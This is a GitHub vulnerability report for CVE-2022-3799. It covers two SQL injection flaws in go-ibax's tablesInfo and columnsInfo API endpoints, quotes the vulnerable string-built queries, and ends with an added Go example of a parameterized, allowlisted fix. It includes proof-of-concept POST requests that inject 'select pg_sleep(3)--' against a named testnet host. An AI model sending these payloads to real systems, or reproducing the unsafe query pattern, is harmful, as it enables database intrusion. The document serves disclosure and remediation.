CVE-2022-3799: SQL Injection vulnerabilities · Issue #2060 · IBAX-io/go-ibax

A vulnerability classified as critical was found in IBAX go-ibax. Affected by this vulnerability is an unknown functionality of the file /api/v2/open/tablesInfo. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212635.


Describe the bug

There are two SQL injection vulnerabilities.

First place

file:

query := fmt.Sprintf("SELECT tablename from pg_tables where schemaname ='public' and tablename like %s order by %s offset %d limit %d", "'%"+form.Table_name+"%'", form.Order, (form.Page-1)*form.Limit, form.Limit)

POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo

data: page=1&limit=1&order=1; select pg_sleep(3)--

Second place

file:

sqlQuery := fmt.Sprintf("SELECT column_name,data_type,column_default FROM information_schema.columns WHERE table_name='%s' ORDER BY %s", form.Table_name, order)

POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/columnsInfo

data: table_name=1; select pg_sleep(3)--

Reproduction

POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo

data: page=1&limit=1&order=1; select pg_sleep(3)--

As you can see, when I use pg_sleep, the request is delayed 3s.

System Info / Logs

No response

Validations

  • Read the docs.
  • Check that there isn’t already an issue that reports the same bug to avoid creating a duplicate.
  • Check that this is a concrete bug. For Q&A open a GitHub Discussion or join our Discord Chat Server.
  • The provided reproduction is a minimal reproducible example of the bug.
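
A hardened form of the first query, added here as an example and not taken from go-ibax or its fix: values travel as bind parameters, and because an ORDER BY identifier cannot be bound, it is checked against an allowlist. The names `safeOrderBy` and `buildTablesQuery`, the allowlist contents and the limit cap of 100 are assumptions made for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// Assumed allowlists (not from go-ibax): sortable pg_tables columns, directions.
var sortableColumns = map[string]bool{"tablename": true, "tableowner": true}
var directions = map[string]string{"asc": "ASC", "desc": "DESC"}

// safeOrderBy maps input such as "tablename desc" to a fixed ORDER BY fragment.
// Identifiers cannot be sent as bind parameters, so anything that is not on
// the allowlist is rejected rather than escaped.
func safeOrderBy(order string) (string, error) {
	f := strings.Fields(strings.ToLower(order))
	if len(f) == 1 {
		f = append(f, "asc") // direction omitted: default to ascending
	}
	if len(f) != 2 || !sortableColumns[f[0]] || directions[f[1]] == "" {
		return "", errors.New("order: not an allowed column/direction")
	}
	return f[0] + " " + directions[f[1]], nil
}

// buildTablesQuery returns SQL text plus arguments for database/sql's Query.
// The LIKE pattern, offset and limit are passed as $1..$3, never as SQL text.
func buildTablesQuery(tableName, order string, page, limit int) (string, []interface{}, error) {
	orderBy, err := safeOrderBy(order)
	if err != nil {
		return "", nil, err
	}
	if page < 1 || limit < 1 || limit > 100 {
		return "", nil, errors.New("page/limit out of range")
	}
	q := "SELECT tablename FROM pg_tables WHERE schemaname = 'public' " +
		"AND tablename LIKE $1 ORDER BY " + orderBy + " OFFSET $2 LIMIT $3"
	return q, []interface{}{"%" + tableName + "%", (page - 1) * limit, limit}, nil
}

func main() {
	// The order value from the report is rejected before any SQL is built.
	_, _, err := buildTablesQuery("keys", "1; select pg_sleep(3)--", 1, 1)
	fmt.Println("reported order value:", err)
	q, args, _ := buildTablesQuery("keys", "tablename desc", 2, 10)
	fmt.Println(q, args)
}
```

The same pattern applies to the second query: bind `table_name` as a parameter and pass `order` through the allowlist check.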
